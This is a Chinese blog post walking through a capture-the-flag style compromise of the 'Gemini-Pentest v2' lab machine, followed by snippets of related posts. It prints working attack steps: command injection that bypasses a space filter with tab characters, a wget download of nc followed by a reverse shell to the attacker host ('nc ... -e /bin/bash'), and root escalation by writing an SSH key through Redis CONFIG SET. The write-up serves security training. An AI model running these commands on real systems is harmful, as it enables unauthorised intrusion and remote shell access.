Gemini-Pentest v2靶机打靶过程及思路

已于 2022-07-22 18:14:54 修改
阅读量323 收藏
点赞数
文章标签: 网络安全
于 2022-05-24 13:35:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52610024/article/details/124945236
版权

1.常规端口及服务发现

2.查看源码发现会使用token来校验,使用dirb来进行路径爆破,在registration.php
页面下存在注册页面,还有activate页面可以找到激活码,开始进行激活码爆破
使用bp的 pithchfork草叉进行爆破得到激活码为000511成功激活账号,登录进去页面

3.翻墙加载资源后,尝试上一台靶机的xss攻击发现失败,均当做字符串处理

4.发现每一个账号页面注释下均存在一个hash值,为sha1加密算法
在md5hashing.net网站破解得到管理员账号密码,登录进去发现一个命令执行选项,
截包发现需要校验ip地址,将数据包加入X-Forwarded-For:127.0.0.1但是失败
安装waf bypass插件,在project options选项下启用该插件

5.成功访问命令执行页面,但是过滤了空格符号,使用tab空格符号绕过,对应编号为%09,尝试nc命令失败。开启本机nc目录下的
python服务,下载成功后成功保存到目标靶机
wget http://10.0.2.25/usr/bin/nc -O /tmp/nc -O 意思是输入到目标目录
chmod +x /tmp/nc
/tmp/nc 10.0.2.25 4444 -e /bin/bash
本机开启侦听端口后连接成功。突破边界拿下shell

6.开始进行提权
查看内核版本无法提权,查看开放端口6379下开放了redis服务且拥有root权限
ps -ef | grep redis
cd /etc/redis ls -la查看到存在配置文件里面存在账号密码
登录成功,但是终端命令不完善
cd .ssh
.ssh$ nc -nvlp 4444 > authorized_keys
ssh-keygen -t rsa
cd .ssh
nc 10.1.8.138 4444< id_rsa.pub -w 1
ssh登录账号成功
redis-cli -a 密码登录成功
/.ssh$ (echo -e “\n\n”; cat authorized_keys;echo -e “\n\n”) > pub.txt
cat pub.txt | redis-cli -a 密码 -x set ssh_key
再次登录 CONFIG set dir /root/.ssh
config set dbfilename “authorized_keys”
save

7.再次ssh登录成功拿下root权限,打靶完成

zsszjybb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VnlnHub GeminiInc-Pentest-v2
weixin_45682839的博客
10-26 483
涉及知识:主机扫描、端口服务探测、WEB信息收集、敏感目录探测、暴力破解、Anti CSRF Token、框架漏洞利用、加解密、网站防护绕过、linux本地提权、redis提权等。
主机渗透——CRC_3_PENTEST_2_WORDPRESS
B_roin的博客
02-15 1158
1. 该题使用的是wordpress框架,可以利用WPScan进行扫描 注意:带着token才能扫描出漏洞 WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932 在这里利用mailpress插件的命令执行漏洞,越权执行命令 2. 利用漏洞 http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php 利用hackbar或者burp su
Gemini-Pentest靶机打靶过程思路
qq_52610024的博客
05-21 314
发现gemini2账号下存在/bin/bash执行权限,读取/var/www/html/tese2/inc/setting.php下的数据库账号密码。5.读取到私钥信息,读取authorized_keys,发现信息提示可以使用公钥私钥来登录,再次读取id_rsa.pub公钥文件,,发现pdf界面下使用的时候wkhtmltppdf组件,可以将html代码转换成pdf,搜索发现。可以加载js代码,存在xss漏洞,看到url地址里面存在uid数字,测试但是不存在sql注入。发现最终显示成功,读取到目标文件内容。.
Vulnhub靶机:GEMINI INC_ 2
LainWith的博客
08-09 591
系列Gemini Inc(此系列共2台)发布日期:2018年04月29日注释: 使用vmwar workstation运行虚拟机难度: 中目标: 取得 root 权限 + Flag主机发现端口扫描信息收集隐藏路径爬取开放注册激活码爆破密码破解WAF Bypass命令注入黑名单绕过SSH公钥认证Redis漏洞利用本地提权。...
Vikings靶机打靶过程思路
qq_52610024的博客
05-02 816
ss-pantu|grep18812发现开启,并且是本机127.0.0.1,所以代码需要在靶机上运行。7.将数字进行ASCII编码还原,将得到的字符串进行ssh登录,发现进入后进行自动sudo。先bin/bash-i进行提权,查看运行脚本的文件,里面运用了rpyc远程管理。boat文件里面给出提示是考拉兹猜想,进行质数查找,编写简单的素数判断程序。5.发现解压后有图片文件,思考是否有隐写数,使用工具进行探测隐写。侦探发现是一个zip压缩文件,下载保存后进行解压发现需要密码。...
Vulnhub-Gemini-Pentest-v1
weixin_44805159的博客
04-18 332
其中date命令没有写绝对路径,我们可以使用Linux环境变量提权,使用listinfo命令去执行我们编译的恶意date脚本,从而达到提权的目的。尝试读取shadow文件失败,读取root和gemini1下的bash_history失败,最后尝试读取/home/gemini1下的私钥文件。以上信息说明此程序为:这是一个内部web应用程序,旨在让员工查看他们的个人资料详细信息,并允许他们将自己的详细信息导出为PDF格式。功能点不多,登录退出,修改个人信息,导出文件等功能。将私钥文件保存为id_rsa文件。
渗透测试
crj252196873的博客
01-28 145
渗透测试指尽可能完整的模拟黑客的攻击方法,对目标网络、系统、主机、应用程序的安全性做深入的测试,来发现系统最薄弱的环节。. 。 ...
gemini-python:Gemini API和Websocket的python客户端
01-31
Gemini API和Websocket的python客户端 入门 安装 pip install gemini_python 公共客户 该终结点不需要api键,并且可以在没有Gemini帐户的情况下使用。 该自述文件将记录该类的一些方法和功能。 import gemini r = ...
gemini-ios:Elaho-Gemini协议的iOS浏览器
02-28
Elaho(适用于iOS的Gemini) 一个浏览器。 支持最新的Gemini标准,包括: ... 提取项目依赖项: cd gemini-ios sh ./bootstrap.sh 在Xcode中打开Client.xcodeproj 。 在Xcode中构建Gemini方案。 建立用户脚本
GNIRSLongSlit:Python 2.7代码可减少来自Gemini-NGNIRS的Longslit数据
02-22
GNIRSLongSlit Python 2.7代码可减少来自Gemini-N / GNIRS的长缝数据该代码已通过111 / mm光栅的X和J波段光谱进行了测试
gemini-snippets:一系列Sublime Text片段,可加快Gemini CSS和Gemini JS的开发速度
04-27
一系列Sublime Text片段,可加快Gemini CSS和Gemini JS的开发速度 崇高文本的快速发展 通过提供关键字和选择器制表符来创建代码的方式,此命名空间的Gemini代码片段集合使开发人员可以为各种Gemini Framework模块...
mixxx-gemini-gmx:Mixxx的Gemini GMX映射和脚本
02-14
Gemini GMX Mixxx映射 正在进行的映射。 它的当前状态是工作状态-足以用于生产中。 此存储库中有2个映射: 一个用于控制器的MIDI接口 一个用于控制器的HID接口 HID接口可以做的比MIDI接口大得多,因此我建议仅...
渗透工具-pentestBox入门介绍使用
aming小老弟
12-20 5163
0x01介绍 PentestBox:渗透测试盒子 顾名思义,这是一个渗透工具包, 但是不同于绝大多数国内xx工具包的是, 这里集成的大都是Linux下的工具, Kali Linux上面的常用的很多工具这里面也都集成了。 PentestBox官网:https://pentestbox.org/zh/ 官方的介绍如下: PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境 为什么又有一个渗透测试环境? PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。 .
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8275
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
rockyou.txt
06-06
rockyou
ASP+ACCESS网上人才信息管理系统(源代码+论文)【ASP】.zip
06-06
ASP+ACCESS网上人才信息管理系统(源代码+论文)【ASP】
河北金融学院经济大数据课设2024年 软科学校爬虫课设
06-06
河北金融学院经济大数据课设2024年 软科学校爬虫课设
widgetsnbextension-4.0.0b0-py3-none-any.whl
最新发布
06-06
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
协同过滤服务+源代码+文档说明
06-06
- 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
AI大模型Gemini
12-13
model = GeminiForSequenceClassification.from_pretrained('microsoft/Gemini-L') # 准备输入文本 text = "This is a positive sentence." # 分词并转换为模型输入格式 inputs = tokenizer(text, return_tensors=...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值